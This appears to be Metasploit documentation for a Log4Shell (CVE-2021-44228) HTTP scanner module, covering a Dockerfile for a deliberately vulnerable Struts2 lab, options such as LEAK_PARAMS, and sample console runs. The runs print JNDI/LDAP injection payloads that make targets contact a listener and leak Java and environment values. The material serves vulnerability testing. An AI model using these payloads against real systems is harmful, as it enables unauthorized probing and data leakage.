4.2 KiB
Vulnerable Application
This module will scan an HTTP end point for the Log4Shell vulnerability by injecting a format message that will
trigger an LDAP connection to Metasploit. This module is a generic scanner and is only capable of identifying
instances that are vulnerable via one of the pre-determined HTTP request injection points. These points include
HTTP headers and the HTTP request path. URI paths for common, known-vulnerable applications are included
in the data/exploits/CVE-2021-44228/http_uris.txt data file.
This module has been successfully tested with:
- Apache Solr
- Apache Struts2
- Spring Boot
- VMWare VCenter
Verification Steps
- Setup a vulnerable Struts2 instance (see the steps below)
- Start msfconsole
- Do:
use auxiliary/scanner/http/log4shell_scanner - Set the
SRVHOST,RHOSTS,RPORTandTARGETURIoptions- For Struts2, set
TARGETURIto/struts2-showcase/
- For Struts2, set
- Do:
run - The target should be identified as vulnerable
Apache Struts2 Setup
The following docker file can be used to setup a vulnerable Struts2 instance for testing.
#
# To build the image:
# docker build . -t struts2:2.5.28
# To run the container:
# docker run --name struts2 --rm -p 8080:8080 struts2:2.5.28
#
ARG version=2.5.28
FROM bitnami/tomcat:9.0
USER root
ENV TOMCAT_PASSWORD password
RUN apt-get update && \
apt-get -y install unzip && \
apt-get clean && \
rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
RUN curl https://archive.apache.org/dist/struts/2.5.28/struts-2.5.28-all.zip > struts-all.zip && \
unzip struts-all.zip && \
cp /struts-2.5.28/apps/struts2-showcase.war /bitnami/tomcat/webapps/
Options
HTTP_METHOD
The HTTP method to use.
HEADERS_FILE
File containing headers to check, one per line. Lines starting with # will be treated as comments.
URIS_FILE
File containing additional URIs to check, one per line. These values will be appended to the TARGETURI option. Lines
starting with # will be treated as comments. Lines may also contain the string ${jndi:uri} which will be used as the
injection point. This enables query parameters to be included in the request which are required for certain
applications.
LEAK_PARAMS
Additional parameters to leak, separated by the ^ character. For example the following would leak the USER and PATH
environment variables: ${env:USER}^${env:PATH}. See the Log4j Lookups wiki page for more information
on available parameters.
LDAP_TIMEOUT
Time in seconds to wait to receive LDAP connections.
Scenarios
Apache Struts2
msf6 > use auxiliary/scanner/http/log4shell_scanner
msf6 auxiliary(scanner/http/log4shell_scanner) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 auxiliary(scanner/http/log4shell_scanner) > set SRVHOST 192.168.159.128
SRVHOST => 192.168.159.128
msf6 auxiliary(scanner/http/log4shell_scanner) > set RPORT 8080
RPORT => 8080
msf6 auxiliary(scanner/http/log4shell_scanner) > set TARGETURI /struts2-showcase/
TARGETURI => /struts2-showcase/
msf6 auxiliary(scanner/http/log4shell_scanner) > run
[*] Started service listener on 192.168.159.128:389
[+] Log4Shell found via /struts2-showcase/%24%7bjndi%3aldap%3a%24%7b%3a%3a-/%7d/192.168.159.128%3a389/r7yol50kgg7be/%24%7bsys%3ajava.vendor%7d_%24%7bsys%3ajava.version%7d%7d/ (java: BellSoft_11.0.13)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/log4shell_scanner) >
Apache Solr
Apache Solr is trivially exploitable by a remote and unauthenticated attacker when in its default configuration:
msf6 > use auxiliary/scanner/http/log4shell_scanner
msf6 auxiliary(scanner/http/log4shell_scanner) > run http://10.10.235.209:8983/ srvhost=10.9.4.245
[*] Started service listener on 10.9.4.245:389
[+] 10.10.235.209:8983 - Log4Shell found via /solr/admin/cores?action=CREATE&wt=json&name=%24%7bjndi%3aldap%3a/10.9.4.245%3a389/vslscuy7m6q9pgfc18h/%24%7bsys%3ajava.vendor%7d_%24%7bsys%3ajava.version%7d%7d (java: Oracle Corporation_1.8.0_181)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Sleeping 30 seconds for any last LDAP connections
[*] Auxiliary module execution completed